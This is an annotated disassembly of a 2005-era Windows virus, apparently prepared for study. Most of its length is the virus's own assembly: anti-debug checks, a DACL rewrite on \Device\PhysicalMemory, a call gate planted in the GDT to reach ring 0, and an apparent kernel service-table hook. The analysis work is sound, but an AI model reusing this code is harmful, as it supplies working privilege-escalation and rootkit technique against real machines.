;========================================================================
; Created by codez @2005.
; Date: 2005/06/19
; 转载请保留此信息,谢谢!
;========================================================================
; 说明:
; 抱歉,这里的分析并不完整,我会抽空补上。
;
; 欠缺注视部分为 Ring0 代码 (欠缺内容包括:进入Ring0 后的检查部分以及Ring0驻留部分)
; 原因: 这个东西在我的 Win2K Pro SP4 和 WinXP SP2 上面根本不能进入 Ring0,完全模拟分析太费事:(
;
; 一些有用的部分:
; 1. 病毒判断自身是否驻留内存的标志: if (dr0 == 0x474E4159) goto has_in_memory;
; 2. 病毒发作条件:
; mov ax, 1016h
; out 70h, al
; in al, 71h
; xchg ah, al
; out 70h, al
; in al, 71h
;
; xor ax, 926h ; 这个发作条件太苛刻了,几乎没有电脑能够触发它!
; jnz do_not_trigger ; 真不知道为什么瑞星要把它的等级定的那么高!!!
;
;=========================================================================
; 其他:
; 由于 codez 水平有限,分析也比较匆忙 (大概花了两个晚上的时间),另外还有一些东西也是初次接触,
; 如果有任何错误,请发信通知我!不胜感激!
;=========================================================================
; 警告:
; 本文仅供学习研究之用,任何人不得将其用于非法用途,对于任何与之相关所带来的后果均由使用者
; 承担。
;=========================================================================
; Two dwords that immediately precede the virus entry point (start).
; loop_move_virus in start reads them as [esi-8] / [esi-4] relative to each
; body block, so every block in the chain carries this same 8-byte prefix.
block2_addr dd 5683Ah ; 45683A: RVA of block2 (block2 holds the payload/damage code); a 0 link ends the chain
block1_len dd 93Dh ; byte length of block1 (this block); used as the rep movsb count when the body is copied
; ======================= S U B R O U T I N E =======================
; ----------------------------------------------------------------------
; start: virus entry point (delta-offset code; every data and API slot is
; addressed relative to ebp = 453A3E, the address of the kernel32 hash table).
; Flow: scan memory for kernel32 -> install SEH -> anti-debug + API resolve
; (Load_apis) -> copy the body into fresh memory -> open \Device\PhysicalMemory
; (rewriting its DACL if the first open is refused) -> map the GDT page ->
; plant a call gate -> far-call into VIRUS_RING0_GAME. Every failure path ends
; at go_run_host, which transfers control to the host's original entry point.
; Note: IDA's "start endp" below is only a listing boundary; execution runs
; straight past it into the SetEntriesInAclA call.
; ----------------------------------------------------------------------
public start
start proc near
call $+5 ; push the address of the next instruction
pop ebp ; ebp = that address (delta-offset base)
add ebp, 376h ; ebp = 453A3E (fixed base for all [ebp+x] references below)
lea edi, [ebp-8] ; edi = 453A36 -> "KERNEL32" name followed by its hash table (input of seek_module_and_apis)
nop
nop
nop
mov ebx, [esp+0] ; Fetch data: dword ptr [esp] -> pointer to Kernel32 hModule
cmp ebx, 80000000h ; Do not run on Win9X system.
ja go_run_host
; ============================
mov ebx, 77E00000h ; ugly code, but can be work! (hard-coded fuzzy kernel32 base; the scan starts here)
call seek_module_and_apis ; ;===========================================
; ; input:
; ; edi -> HMODULE Name
; ; ebx -> HMODULE fuzzy addr in memory
; ;===========================================
lea eax, [ebp-143h] ; seh_handler2 (4538FB): any fault from here on resumes at go_run_host
push eax ; seh error handler: 4538FB
xor eax, eax
push dword ptr fs:[eax] ; link the previous EXCEPTION_REGISTRATION
mov fs:[eax], esp ; install it (__try)
call Load_apis ; anti-debug checks + load/resolve advapi32 and ntdll; jumps to go_run_host itself on failure
push 4 ; flProtect = PAGE_READWRITE
push 1000h ; flAllocationType = MEM_COMMIT
push 17A8h ; dwSize = 0x17A8
nop
push 0 ; lpAddress = NULL
call dword ptr [ebp+20h] ; VirtualAlloc
nop
nop
nop
or eax, eax
jz go_run_host ; allocation failed -> give up
cld
lea esi, [ebp-37Bh] ; esi - 004536C3 (virus start addr)
mov edi, eax ; edi = destination (fresh memory)
mov edx, ebp
sub edx, [ebp-14Fh] ; edx = 400000 (hModule); [ebp-14Fh] is the imm32 of "sub ebp, 53A3Eh" at go_run_host
sub esi, edx ; esi = RVA of the body; the loop re-adds the image base
loop_move_virus: ; CODE XREF: start+7Ej
add esi, edx ; esi = VA of the current block
movzx ecx, word ptr [esi-4] ; 93D (block1_len prefix = byte count of this block)
push esi
rep movsb ; move virus body to new memory alloced (edi keeps advancing, so the blocks are packed back to back)
pop esi
mov esi, [esi-8] ; block2_addr prefix = RVA of the next block; 0 ends the chain
or esi, esi
jnz short loop_move_virus
mov [ebp+0E2h], eax ; [453B20] = hMemAlloced (this patches the imm32 of "mov esi, 990000h" inside VIRUS_RING0_GAME)
lea edx, [ebp-57h] ; 004539E7 (unicode: \Device\PhysicalMemory)
nop
nop
nop
lea edi, [ebp-20h] ; [453A1E]
nop
nop
nop
mov [ebp-5Bh], edx ; [4539E3] = edx (UNICODE_STRING.Buffer of the device name)
nop
nop
nop
and di, 0FFFCh ; 00453A1C (round down to a 4-byte boundary: OBJECT_ATTRIBUTES scratch area)
push edi
push 18h
pop ecx
push ecx
xor eax, eax
rep stosb ; clear memory (0x18 bytes = sizeof(OBJECT_ATTRIBUTES))
pop ecx
pop edi
mov esi, edi ; esi = &OBJECT_ATTRIBUTES
mov [edi], eax
mov [esi], ecx ; OBJECT_ATTRIBUTES.Length = 0x18
; OBJECT_ATTRIBUTES.RootDirectory = 0
add edi, 8
lea eax, [edx-8] ; 4539DF: UNICODE_STRING {Length 0x2C, MaximumLength 0x2E, Buffer} stored just before the name
mov [edi], eax ; OBJECT_ATTRIBUTES.ObjectName = \Device\PhysicalMemory
mov dword ptr [edi+4], 240h ; OBJECT_ATTRIBUTES.Attributes = 0x240 = OBJ_KERNEL_HANDLE (0x200) | OBJ_CASE_INSENSITIVE (0x40)
; other members for OBJECT_ATTRIBUTES are 0
push esi ; ObjectAttributes
push 6 ; #define SECTION_MAP_WRITE 0x0002
; #define SECTION_MAP_READ 0x0004
lea edi, [ebp+10h] ; HANDLE - 00453A4E (the addr_LoadLibraryA slot is reused as the SectionHandle out-parameter)
nop
nop
nop
push edi ; &SectionHandle
;# COPY FROM: WDM.H
;NTSTATUS
; ZwOpenSection(
; OUT PHANDLE SectionHandle,
; IN ACCESS_MASK DesiredAccess,
; IN POBJECT_ATTRIBUTES ObjectAttributes
; );
;#COPY FROM: NTDEF.H
;typedef struct _OBJECT_ATTRIBUTES32 {
; ULONG Length;
; ULONG RootDirectory;
; ULONG ObjectName;
; ULONG Attributes;
; ULONG SecurityDescriptor;
; ULONG SecurityQualityOfService;
;} OBJECT_ATTRIBUTES32;
call dword ptr [ebp+3Ah] ; ZwOpenSection
nop
nop
nop
or eax, eax
jz ok_USE_GDT_enter_ring0 ; 453A1B (STATUS_SUCCESS: the section is open with read/write mapping rights)
push esi ; ObjectAttributes again, for the second open below
;=======================================
; 0x60000 is an ACCESS_MASK here, not MEM_* flags:
; READ_CONTROL (0x00020000) | WRITE_DAC (0x00040000)
; -- just enough to read and rewrite the section's DACL below.
;=======================================
push 60000h
push edi ; &SectionHandle
call dword ptr [ebp+3Ah] ; ZwOpenSection
nop ; NOTE: the NTSTATUS of this second open is never checked
nop
nop
push esi ; parks &OBJECT_ATTRIBUTES on the stack; it becomes the ZwOpenSection argument after "add esp, 0Ch" further down
xor ebx, ebx
push ebx ; slot that receives PSECURITY_DESCRIPTOR
mov eax, esp ; eax = &pSecurityDescriptor
push ebx ; slot that receives the old PACL
mov esi, esp ; esi = &pOldDacl
push eax ; ppSecurityDescriptor
push ebx ; ppSacl = NULL
push esi ; ppDacl
push ebx ; ppsidGroup = NULL
push ebx ; ppsidOwner = NULL
push 4 ; SecurityInfo = DACL_SECURITY_INFORMATION
push 6 ; ObjectType = SE_KERNEL_OBJECT
push dword ptr [edi] ; handle from the second open
call dword ptr [ebp+52h] ; GetSecurityInfo
nop ; al = 6 ?  (original note; the return value is not tested, but see the rep stosb below)
nop
nop
push 20h
pop ecx
lea edi, [ebp+12Eh] ; 00453B6C (0x20-byte scratch used as EXPLICIT_ACCESS; the same bytes hold the ntoskrnl address table in ring 0)
push edi
xor bl, bl ; NOTE: stosb stores AL, not BL -- the block is zeroed only because eax is GetSecurityInfo's return value (expected 0 = ERROR_SUCCESS)
rep stosb ; zero EXPLICIT_ACCESS (leaves ecx = 0)
pop edi
inc bl ; bl = 1
mov byte ptr [edi], 2 ; grfAccessPermissions = SECTION_MAP_WRITE
mov [edi+4], bl ; grfAccessMode = GRANT_ACCESS (1)
mov [edi+14h], bl ; Trustee.TrusteeForm = TRUSTEE_IS_NAME (1)
mov [edi+18h], bl ; Trustee.TrusteeType = TRUSTEE_IS_USER (1)
call push_string ; pushes &aYangmin
; ------------------------------------------------------------------
aYangmin db 'YANGMIN',0 ; trustee name for the new ACE. NOTE(review): the grant goes to an account literally named YANGMIN, so on any other account this DACL edit would not help the caller -- confirm
; ------------------------------------------------------------------
push_string: ; CODE XREF: start+118p
pop dword ptr [edi+1Ch] ; Trustee.ptstrName = "YANGMIN"
push ecx ; ecx == 0 here: slot that will receive the new PACL
push esp ; &pNewAcl
start endp ; (IDA boundary only; the SetEntriesInAclA call continues on the next line)
; (continuation of start: build the new DACL, apply it, close and reopen the section)
push dword ptr [esi] ; OldAcl = the DACL pointer GetSecurityInfo stored
push edi ; ListOfExplicitEntries = EXPLICIT_ACCESS at 453B6C
push 1 ; cCountOfExplicitEntries
call dword ptr [ebp+5Ah] ; SetEntriesInAclA
nop ; return value not checked
nop
nop
xor ebx, ebx
mov eax, [esp] ; eax = NewAcl
push ebx ; pSacl = NULL
push eax ; pDacl = NewAcl
push ebx ; psidGroup = NULL
push ebx ; psidOwner = NULL
push 4 ; DACL_SECURITY_INFORMATION
push 6 ; SE_KERNEL_OBJECT
mov edi, [ebp+10h] ; section handle opened with READ_CONTROL|WRITE_DAC
nop
nop
nop
push edi
call dword ptr [ebp+56h] ; SetSecurityInfo
nop
nop
nop
push edi
call dword ptr [ebp+3Eh] ; ZwClose
nop
nop
nop
add esp, 0Ch ; drop the NewAcl, pOldDacl and pSecurityDescriptor slots; the parked &OBJECT_ATTRIBUTES is now at [esp]
push 6 ; SECTION_MAP_READ | SECTION_MAP_WRITE
lea edi, [ebp+10h]
nop
nop
nop
push edi ; &SectionHandle
call dword ptr [ebp+3Ah] ; ZwOpenSection (third argument = the &OBJECT_ATTRIBUTES left on the stack)
nop
nop
nop
or eax, eax
jnz go_run_host ; still refused -> give up (the author notes the ring-0 path never succeeds on Win2K SP4 / XP SP2)
ok_USE_GDT_enter_ring0: ; CODE XREF: start+CEj
; The section is open with write mapping rights: read the GDTR, map the GDT's
; page through the section, write a call gate into it and far-call through it.
lea ecx, [ebp-23h] ; 453A1B (6-byte GDTR scratch; overlaps the OBJECT_ATTRIBUTES built above, which is no longer needed)
nop
nop
nop
sgdt qword ptr [ecx] ; get gdtr info (16-bit limit, 32-bit base)
inc dword ptr [ecx] ; gdtr limit + 1 = table size in bytes
movzx edi, word ptr [ecx] ; edi = gdt length
mov ebx, edi
mov edx, [ecx+2] ; edx = gdt base (the value often is 0x80036000)
cmp edx, 80000000h
jb loc_4538D9 ; 453A4E (base not in the 80000000h..A0000000h window -> abort)
cmp edx, 0A0000000h
ja short loc_4538D9 ; 453A4E
nop
nop
nop
nop
and edx, 1FFFF000h ; maybe 36000 (page-aligned; treats the kernel virtual address as a physical one, i.e. assumes the low identity mapping -- not verified here)
push edi ; dwNumberOfBytesToMap = gdt length
push edx ; dwFileOffsetLow = physical page of the GDT
push 0 ; dwFileOffsetHigh
push 6 ; FILE_MAP_WRITE (2) | FILE_MAP_READ (4)
push dword ptr [ebp+10h] ; ZwOpenSection HANDLE returned (453A4E)
nop
nop
nop
call dword ptr [ebp+24h] ; MapViewOfFile (453A62)
; ===================================
; NOW! Return value: eax - gdt table
; ===================================
nop
nop
nop
or eax, eax
jz short loc_4538D9 ; 453A4E
nop
nop
nop
nop
mov ecx, edi
shr ecx, 3 ; gdt_item_max_count = gdt_table_len / 8
dec ecx ; max_index_value
dec ebx
and bl, 0F8h ; last gdt item offset in the gdt table
lea edi, [eax+ebx] ; last gdt item addr in mem
loc_45388B: ; CODE XREF: .text:00453892j
sub edi, 8 ; step down one descriptor
test byte ptr [edi+5], 0Fh ; type nibble of the access byte: 0 = unused descriptor
loopne loc_45388B ; keep scanning while the entry is in use and entries remain
jnz short loc_4538D9 ; 453A4E (no free descriptor found)
; ==================================
; NOW! EDI - is a reserved gdt item
; ==================================
nop
nop
nop
nop
add edi, 8 ; the next gdt item for using
; NOTE(review): this is the entry *above* the one that tested free -- either the last entry (never tested)
; or one that tested in use. In practice the top of the table is empty, so this lands on the last GDT entry; confirm.
lea edx, [ebp+5Eh] ; enter Ring0 with GDT way (call to 453A9C)
nop
nop
nop
lea esi, [ebp-2Bh] ; VIRUS APPEND FAKE CALL GATE : 453A13
nop
nop
nop
; ====================================
; FILL OFFSET FOR VIRUS CALL GATE
; ====================================
mov [esi], dx ; gate offset 15:0 = VIRUS_RING0_GAME
shr edx, 10h
mov [esi+6], dx ; gate offset 31:16
; ====================================
push edi
mov ecx, 2
rep movsd ; insert virus fake gate into gdt (8 bytes: selector 8, access byte 0ECh = present, DPL 3, 386 call gate)
pop edi
mov edx, edi
sub edx, eax ; byte offset of the new descriptor inside the GDT
or dl, 3 ; selector for call (edi = index<<3+3)
lea eax, [ebp+0Ch] ; 453A4A (6-byte far pointer; a call gate ignores the offset part, only the selector matters)
nop
nop
nop
mov [eax+4], dx ; [453A4E] = DX
push eax
push 26h ; dwMilliseconds = 38
call dword ptr [ebp+28h] ; Sleep (); //453A66
nop
nop
nop
pop eax
call fword ptr [eax] ; enter Ring0 Game (far call through the gate -> VIRUS_RING0_GAME, which returns with retf)
loc_4538D9: ; CODE XREF: .text:0045384Cj
; .text:00453858j .text:00453878j
; .text:00453894j
; Cleanup: close the section handle, unhook the SEH frame, hand control to the host.
push dword ptr [ebp+10h] ; 453A4E
nop
nop
nop
call dword ptr [ebp+3Eh] ; ZwClose 453A7C
nop
nop
nop
xor eax, eax
pop dword ptr fs:[eax] ; remove virus seh handler
add esp, 8 ; drops the handler address plus one more dword. NOTE(review): the paths that jump straight to go_run_host skip this, so stack depth differs per path -- confirm
go_run_host: ; CODE XREF: start+1Bj start+56j
; .text:0045382Dj Load_apis+Dj
; Load_apis+24j .text:00453950j
; push_call_module_2+8j
sub ebp, 53A3Eh ; ebp = image base (this imm32 is also what "sub edx, [ebp-14Fh]" in start reads)
add ebp, 3F491h ; Original RVA = 3F491 (EPO = 43F491)
push ebp
retn ; jump to the host's original entry point
; ------------------------------------------------------------------
seh_handler2: ; SEH handler installed by start (4538FB)
; handler(ExceptionRecord, EstablisherFrame, ContextRecord, DispatcherContext):
; on any exception, point the faulting context's Eip at go_run_host and resume.
call $+5
pop eax ; eax = address of this instruction (453900)
lea eax, [eax-13h] ; eax = resume address = 4538ED = go_run_host
push eax
mov eax, [esp+10h] ; ContextRecord (3rd argument; +4 because of the push above)
pop dword ptr [eax+0B8h] ; CONTEXT.Eip = resume address
xor eax, eax ; ExceptionContinueExecution
retn
; ======================= S U B R O U T I N E =======================
Load_apis proc near ; CODE XREF: start+3Ap
; Requires kernel32 at exactly 77E60000h, runs the anti-debug checks, then
; loads advapi32 and ntdll and resolves their imports. Every failure jumps to
; go_run_host (the first two exits still have pusha/pushf on the stack).
; Note: IDA's "Load_apis endp" is only a listing boundary; the flow continues past it.
pusha
pushf
mov eax, [ebp-64h] ; hKernel32 (4539DA), written by seek_module_and_apis
nop
nop
nop
cmp eax, 77E60000h ; only proceed with kernel32 at this exact base
jnz short go_run_host
call dword ptr [ebp+14h] ; IsDebuggerPresent
nop
nop
nop
or eax, eax
jnz short loc_453934 ; jmp is debugger detected!
; clear eax if your debugger was detected!
nop
nop
nop
nop
call check_softice_in_memory ; eax = 2 if \\.\NTICE could be opened, else 0
loc_453934: ; CODE XREF: Load_apis+17j
or eax, eax
jnz short go_run_host ; debugger or SoftICE present -> abort
popf
popa
call push_module_name ; LoadLibrary (the call pushes &aAdvapi32, which becomes the argument)
; ------------------------------------------------------------------
aAdvapi32 db 'advapi32',0
; ------------------------------------------------------------------
push_module_name: ; CODE XREF: Load_apis+28p
call dword ptr [ebp+10h] ; LoadLibrary
nop
nop
nop
or eax, eax
Load_apis endp ; (IDA boundary only; the result test continues on the next line)
; (continuation of Load_apis)
jz short go_run_host ; LoadLibrary("advapi32") failed
mov ebx, eax ; ebx = hAdvapi32 (exact base; the seek starts 64K below it)
lea edi, [ebp+42h] ; 453a80 -> "ADVAPI32" name + hash table
nop
nop
nop
call seek_module_and_apis ; ;===========================================
; ; input:
; ; edi -> HMODULE Name
; ; ebx -> HMODULE fuzzy addr in memory
; ;===========================================
call push_call_module_2 ; pushes &aNtdll, which becomes LoadLibrary's argument
; ------------------------------------------------------------------
aNtdll db 'ntdll',0
; ======================= S U B R O U T I N E =======================
push_call_module_2 proc near ; CODE XREF: .text:0045395Fp
; Entered with &aNtdll as the "return address" on the stack; LoadLibrary consumes it.
call dword ptr [ebp+10h] ; LoadLibrary("ntdll")
nop
nop
nop
or eax, eax
jz go_run_host
mov ebx, eax ; ebx = hNtdll
lea edi, [ebp+2Ch] ; 453A6A -> "ntdll.dl" name + hash table
nop
nop
nop
call seek_module_and_apis ; ;===========================================
; ; input:
; ; edi -> HMODULE Name
; ; ebx -> HMODULE fuzzy addr in memory
; ;===========================================
retn ; the pushed string address was eaten by stdcall LoadLibrary, so this returns to start (the return address of "call Load_apis")
push_call_module_2 endp
; ======================= S U B R O U T I N E =======================
check_softice_in_memory proc near ; CODE XREF: Load_apis+1Dp
; SoftICE probe: CreateFileA("\\.\NTICE", ...). Returns eax = 2 if the device
; opened (debugger present), 0 otherwise. Clobbers eax and flags.
; Note: IDA's "endp" below is only a listing boundary; the result test continues past it.
xor eax, eax
push eax ; hTemplateFile = NULL
push 80h ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
push 3 ; dwCreationDisposition = OPEN_EXISTING
push eax ; lpSecurityAttributes = NULL
inc eax
push eax ; dwShareMode = 1 (FILE_SHARE_READ)
add eax, 0Bh
push eax ; dwDesiredAccess = 0Ch
call push_ntice_string ; pushes &a_Ntice as lpFileName
; ------------------------------------------------------------------
a_Ntice db '\\.\NTICE',0
; ------------------------------------------------------------------
push_ntice_string: ; CODE XREF: check_softice_in_memory+11p
call dword ptr [ebp+18h] ; CreateFileA
check_softice_in_memory endp ; (IDA boundary only)
; (continuation of check_softice_in_memory: test the CreateFileA result)
nop
nop
nop
inc eax ; INVALID_HANDLE_VALUE (-1) -> 0
jnz short loc_4539BE ; a real handle came back -> SoftICE present
nop
nop
nop
nop
dec eax ; eax = -1 again
push eax
call dword ptr [ebp+1Ch] ; CloseHandle(INVALID_HANDLE_VALUE) -- effectively a no-op
nop
nop
nop
xor eax, eax ; not detected
retn
; ------------------------------------------------------------------
loc_4539BE: ; CODE XREF: .text:004539ADj
; NOTE: the opened NTICE handle is never closed on this path
mov eax, 2 ; detected
retn
; ------------------------------------------------------------------
; Not code: IDA mis-disassembled 12 data bytes here. The encodings are
; 00 59 4D 20 4B 49 4C 4C 20 59 4F 55, i.e. the ASCII string "\0YM KILL YOU".
add [ecx+4Dh], bl ; 00 59 4D
and [ebx+49h], cl ; 20 4B 49
dec esp ; 4C
dec esp ; 4C
and [ecx+4Fh], bl ; 20 59 4F
push ebp ; 55
; ------------------------------------------------------------------
; Data area. Addresses follow the listing's layout (start's ebp = 453A3E).
; The dword values are a snapshot from the dumped run, not constants.
db 0 ; 4539D0: 10 bytes not referenced by the code shown in this listing
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 1 ;
db 0 ;
db 0 ;
db 0 ;
hKernel32 dd 80400000h ; 4539DA ([ebp-64h]): written by seek_module_and_apis with the base it located; Load_apis requires 77E60000h. 80400000h presumably remains from the ring-0 run, which writes the same slot
db 90h ;
db 2Ch ; , ; 4539DF: UNICODE_STRING.Length = 0x2C (44 bytes)
db 0 ;
db 2Eh ; . ; UNICODE_STRING.MaximumLength = 0x2E
db 0 ;
db 32h ; 2 ; UNICODE_STRING.Buffer (stale 00444632h; start rewrites it with 4539E7h via [ebp-5Bh])
db 46h ; F
db 44h ; D
db 0 ;
db 5Ch ; \ ; unicode: \Device\PhysicalMemory (4539E7, UTF-16LE)
db 0 ;
db 44h ; D
db 0 ;
db 65h ; e
db 0 ;
db 76h ; v
db 0 ;
db 69h ; i
db 0 ;
db 63h ; c
db 0 ;
db 65h ; e
db 0 ;
db 5Ch ; \ ; NOTE(review): the "db 0" that should follow this byte appears to have been folded into this comment during extraction
db 50h ; P
db 0 ;
db 68h ; h
db 0 ;
db 79h ; y
db 0 ;
db 73h ; s
db 0 ;
db 69h ; i
db 0 ;
db 63h ; c
db 0 ;
db 61h ; a
db 0 ;
db 6Ch ; l
db 0 ;
db 4Dh ; M
db 0 ;
db 65h ; e
db 0 ;
db 6Dh ; m
db 0 ;
db 6Fh ; o
db 0 ;
db 72h ; r
db 0 ;
db 79h ; y
db 0 ;
; ===================================
; VIRUS APPEND FAKE CALL GATE
; ===================================
; 453A13 ([ebp-2Bh]): 8-byte 386 call-gate descriptor. start fills the two
; offset words with &VIRUS_RING0_GAME and copies it into the mapped GDT.
dw 46E7h ; OFFSET LOWORD
dw 8 ; SELECTOR (ring-0 code segment)
db 0 ; COUNT
db 0ECh ; P:1; DPL:3; DT:0(SYS/GATE); TYPE:C(386 CALL GATE);
dw 44h ; OFFSET HIWORD
; ==================================
; 453A1B ([ebp-23h]): sgdt scratch (limit then base). The OBJECT_ATTRIBUTES
; that start builds at 453A1C overlaps this area; the snapshot shows its
; ObjectName (stale 0044462Ah, 8 below the stale Buffer above) and
; Attributes (240h) fields still in place.
db 0 ;
db 4 ; limit after "inc": 0400h -> 128 descriptors
db 0 ;
db 60h ; ` ; base = 80036000h
db 3 ;
db 80h ; €
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 2Ah ; * ; 453A25: OBJECT_ATTRIBUTES.ObjectName (stale)
db 46h ; F
db 44h ; D
db 0 ;
db 40h ; @ ; 453A29: OBJECT_ATTRIBUTES.Attributes = 240h
db 2 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
db 0 ;
; ============================
; 453A36 ([ebp-8]): module name, 8 bytes, compared as two dwords against the export-table name
db 4Bh ; K
db 45h ; E
db 52h ; R
db 4Eh ; N
db 45h ; E
db 4Ch ; L
db 33h ; 3
db 32h ; 2
; ============================
; kernel32_api_hash_code_table -- 453A3E (ebp+0): one 16-bit name hash per import,
; in the same order as the address slots below; 0 terminates (see seek_all_api)
; ============================
dw 0F3D5h ; LoadLibraryA
dw 1336h ; IsDebuggerPresent
dw 8406h ; CreateFileA
dw 4873h ; CloseHandle
dw 0C6C7h ; VirtualAlloc
dw 66F4h ; MapViewOfFile
dw 837Fh ; Sleep
; -------------------------
dw 0 ; separator
; =============================
; KERNEL32.DLL -- resolved addresses, (re)written by seek_all_api at run time;
; the values here are left over from the dumped run
; =============================
addr_LoadLibraryA dd 6C8h ; later, the dword will be used for
; storing HANDLE of ZwOpenSection
addr_IsDebuggerPresent dd 77E6171Dh
addr_CreateFileA dd 77E6B66Dh
addr_CloseHandle dd 77E676F6h
addr_VirtualAlloc dd 77E67F50h
addr_MapViewOfFile dd 77E6D2D7h
addr_Sleep dd 77E675E0h
; =========================
; 453A6A ([ebp+2Ch]): ntdll module name -- only 8 characters are compared, hence "ntdll.dl"
db 6Eh ; n
db 74h ; t
db 64h ; d
db 6Ch ; l
db 6Ch ; l
db 2Eh ; .
db 64h ; d
db 6Ch ; l
; =======================
; 453A72: ntdll name-hash table, 0-terminated
dw 0F092h ; ZwOpenSection
dw 0BCC8h ; ZwClose
dw 0
ZwOpenSection dd 77F86AD5h ; 453A78 ([ebp+3Ah]); filled by seek_all_api
ZwClose dd 77F83763h ; 453A7C ([ebp+3Eh])
; ==============================
; 453A80 ([ebp+42h]): advapi32 module name
db 41h ; A
db 44h ; D
db 56h ; V
db 41h ; A
db 50h ; P
db 49h ; I
db 33h ; 3
db 32h ; 2
; ==============================
; 453A88: advapi32 name-hash table, 0-terminated
dw 6313h ; GetSecurityInfo
dw 0DEA4h ; SetSecurityInfo
dw 39A9h ; SetEntriesInAclA
dw 0
addr_GetSecurityInfo dd 77DC1B02h ; 453A90 ([ebp+52h]); filled by seek_all_api
addr_SetSecurityInfo dd 77DC1BA3h ; 453A94 ([ebp+56h])
addr_SetEntriesInAclA dd 77D92DB6h ; 453A98 ([ebp+5Ah])
; ------------------------------------------------------------------
; ==============================
VIRUS_RING0_GAME: ; 453A9C: target of the call gate (selector 8 -> runs at ring 0); returns with retf
; The author left this part unanalyzed; the comments below describe only
; what the listed instructions do, and mark guesses as such.
pusha
pushf
cli
call $+5
pop ebp ; ebp = 453AA4
lea edi, [ebp+0A8h] ; 453B4C: "ntoskrnl" (name + hash table, same layout as the user-mode tables)
xor edx, edx
mov ebx, 80400000h ; fuzzy ntoskrnl base; the seek starts 64K below it
mov [edi+20h], edx ; clear the first resolved-address slot (453B6C) so success can be tested below
nop
nop
nop
call seek_module_and_apis ; ;===========================================
; ; input:
; ; edi -> HMODULE Name
; ; ebx -> HMODULE fuzzy addr in memory
; ;===========================================
cmp [edi+20h], edx ; still 0 -> the exports were not resolved
nop
nop
nop
jz loc_453B49
cld
mov edx, [edi+24h] ; second resolved export (hash 75D8h)
nop
nop
nop
mov edx, [edx+1] ; reads the imm32 at that export's first instruction (presumably a Zw* stub's "mov eax, <service index>") -- TODO confirm
mov eax, [edi+20h] ; first resolved export (hash 927Eh)
nop
nop
nop
mov eax, [eax] ; dereferenced as a data export (presumably a service-table base pointer) -- TODO confirm
mov edi, [eax+edx*4] ; edi = current table entry at that index
mov ecx, [ebp+7Ch] ; 453B20 = hMemAlloced (imm32 patched by start; the user-mode copy of the body)
nop
nop
nop
mov [ecx+5EBh], edi ; save the original entry into the copy at +5EBh: one byte past the start of the unlisted resident part (4536C3+5EAh = 453CAD, right after creat_hash_code_for_api_name)
mov byte ptr [ecx+5FFh], 0
mov ecx, dr0
cmp ecx, 474E4159h ; mask in memory? (little-endian ASCII "YANG" -- the residency marker kept in DR0; a checkable indicator for a memory scanner)
jz short loc_453B49 ; already resident -> nothing to do
nop
nop
nop
nop
lea edi, [eax+edx*4] ; edi = &table[index]
push 4D59h ; 3rd argument (reads as ASCII "YM" if it is a pool tag)
push 30BEh ; 2nd argument (size?)
nop
push 0 ; 1st argument
call dword ptr [ebp+0D8h] ; maybe alloc a memory (5th resolved export, hash 0C12Eh; the arguments look like ExAllocatePoolWithTag(0, 30BEh, 'YM') -- unverified)
or eax, eax
jz short loc_453B49
nop
nop
nop
nop
push edi ; save &table[index]
mov esi, 990000h ; imm32 at 453B20 = [ebp+0E2h] in start, overwritten with hMemAlloced at run time; 990000h is the stale value from the dump
push esi
mov edi, esi
lea esi, [ebp-3E1h] ; 4536C3
mov ecx, 5EAh
nop
rep movsb ; refresh the first 5EAh bytes of the copy from the (now patched) original body
pop esi ; esi = copy
mov edi, eax ; edi = allocated block
push 0BD4h
nop
pop ecx
rep movsb ; copy 0BD4h (= 2 x 5EAh) bytes of the copy into the allocation
pop edi ; edi = &table[index]
add eax, 5EAh
mov [edi], eax ; table[index] = allocation + 5EAh -> the entry now points at the virus' resident part (looks like a service-table hook; the original entry was saved at +5EBh above) -- unverified
loc_453B49: ; CODE XREF: .text:00453AC3j
; .text:00453AFAj .text:00453B18j
popf
popa
retf ; back through the call gate to ring 3
; ------------------------------------------------------------------
; 453B4C ([ebp+0A8h] in VIRUS_RING0_GAME): ntoskrnl module name (8 bytes)
db 6Eh ; n ; ntoskrnl
db 74h ; t
db 6Fh ; o
db 73h ; s
db 6Bh ; k
db 72h ; r
db 6Eh ; n
db 6Ch ; l
; 453B54: ntoskrnl name-hash table (11 entries, 0-terminated). Only three are
; identifiable from this listing: #0 is used as a data pointer, #1 has its
; first-instruction imm32 read, #4 is called as the allocator; BCC8h is the
; same hash as ntdll's ZwClose entry.
dw 927Eh ; #0 -- dereferenced as data in VIRUS_RING0_GAME
dw 75D8h ; #1 -- imm32 at +1 read in VIRUS_RING0_GAME
dw 0B063h
dw 9B3Ah
dw 0C12Eh ; #4 -- called via [ebp+0D8h] (allocator, presumably)
dw 90F8h
dw 5B5Ah
dw 0F72Eh
dw 70EAh
dw 2B7Ah
dw 0BCC8h ; same value as the ZwClose hash in the ntdll table
dw 0
; 453B6C: resolved ntoskrnl addresses (stale snapshot); in ring 3 the same
; 0x20 bytes serve as start's EXPLICIT_ACCESS scratch
dd 8046D7A0h ; #0 -> 453B6C
dd 80400A06h ; #1 -> 453B70
dd 8040120Ah
dd 804016C6h
dd 8046A6C0h ; #4 -> 453B7C
dd 804A81C6h
dd 804554E5h
dd 8042D8A4h
dd 8040141Ah
dd 8040101Ah
dd 80400986h
dd 0
; ======================= S U B R O U T I N E =======================
; ;===========================================
; ; input:
; ; edi -> HMODULE Name
; ; ebx -> HMODULE fuzzy addr in memory
; ;===========================================
seek_module_and_apis proc near ; CODE XREF: start+26p .text:0045395Ap
; push_call_module_2+16p
; .text:00453AB8p
; Walks memory upward in 64K steps from ebx looking for an MZ/PE image whose
; export-directory name starts with the 8 bytes at [edi]; on a match calls
; seek_all_api to fill the address slots that follow the hash table at [edi+8].
; Probing faults are absorbed by seh_handler, which resumes the loop at the
; next candidate. Preserves all registers (pusha/pushf); writes [4539DA].
pusha
pushf
call $+5
pop ebp ; EBP = 453BA3 (this routine keeps its own delta base, distinct from start's)
push ebp
lea eax, [ebp+6Ch] ; seh handler for error: 453C0F (seh_handler)
nop
nop
nop
push eax
xor ecx, ecx
push dword ptr fs:[ecx]
mov fs:[ecx], esp ; __try
sub ebx, 10000h ; pre-decrement; the loop adds 64K back before the first probe
loop_to_seek_pe_module: ; CODE XREF: seek_module_and_apis+31j
; seek_module_and_apis+3Dj
; seek_module_and_apis+53j
